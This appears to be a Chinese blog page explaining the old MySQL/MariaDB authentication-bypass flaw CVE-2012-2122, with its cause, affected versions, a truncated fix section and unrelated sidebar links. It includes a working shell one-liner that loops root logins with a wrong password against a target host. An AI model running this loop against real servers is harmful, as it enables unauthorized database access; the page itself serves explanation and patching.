当前位置:网站首页>Mysql 身份认证绕过漏洞(CVE-2012-2122)
Mysql 身份认证绕过漏洞(CVE-2012-2122)
2022-07-06 15:32:00 【OOOOOK.2021】
漏洞简介
当连接 MariaDB/MySQL 时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是 memcmp () 返回一个非零值,也会使 MySQL 认为两个密码是相同的。也就是说只要知道用户名,不断尝试就能够直接登入SQL数据库。
受影响版本
- MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not. MySQL
- versions from 5.1.63, 5.5.24, 5.6.6 are not.
出现原因
出现这个漏洞是由于memcmp函数只返回返回-128到127范围内的值,在某些平台上进行了优化,导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。大约256次就可以成功一次。
漏洞复现
扫描开放的端口
用MSF攻击
EXP
for i in `seq 1 1000`; do mysql -uroot -pwrong -h your-ip -P3306 ; done
修复
升级MySQL版本,(低于以下版本的都必须升级到最新版本:5.0版本低于5.0.96;5.1版本低于5.1.63;5.5版本低于5.5.25)停止mysql,备份整个mysql,安装目录,data目录(这个步骤只是预防升级
边栏推荐
- memcached
- 0 basic learning C language - interrupt
- [linear algebra] determinant of order 1.3 n
- 【雅思口语】安娜口语学习记录part1
- 【无标题】
- memcached
- Aardio - Method of batch processing attributes and callback functions when encapsulating Libraries
- QT信号和槽
- Chapter 3: detailed explanation of class loading process (class life cycle)
- Puppeteer连接已有Chrome浏览器
猜你喜欢
Web APIs DOM 时间对象
Leetcode: interview question 17.24 Maximum cumulative sum of submatrix (to be studied)
Daily question 1: force deduction: 225: realize stack with queue
The SQL response is slow. What are your troubleshooting ideas?
Improving Multimodal Accuracy Through Modality Pre-training and Attention
Mysql database basic operations DML
关于声子和热输运计算中BORN电荷和non-analytic修正的问题
Pit encountered by handwritten ABA
【LeetCode】19、 删除链表的倒数第 N 个结点
二分图判定
随机推荐
【LeetCode】19、 删除链表的倒数第 N 个结点
2022-07-05 stonedb的子查询处理解析耗时分析
剪映+json解析将视频中的声音转换成文本
case 关键字后面的值有什么要求吗?
Windows Auzre 微软的云计算产品的后台操作界面
MATLAB小技巧(27)灰色预测
MySQL教程的天花板,收藏好,慢慢看
在IPv6中 链路本地地址的优势
void关键字
OpenNMS separation database
rust知识思维导图xmind
【踩坑合辑】Attempting to deserialize object on CUDA device+buff/cache占用过高+pad_sequence
枚举与#define 宏的区别
MySQL教程的天花板,收藏好,慢慢看
剑指offer刷题记录1
hdu 5077 NAND(暴力打表)
BasicVSR_PlusPlus-master测试视频、图片
Aardio - does not declare the method of directly passing float values
空结构体多大?
金融人士必读书籍系列之六:权益投资(基于cfa考试内容大纲和框架)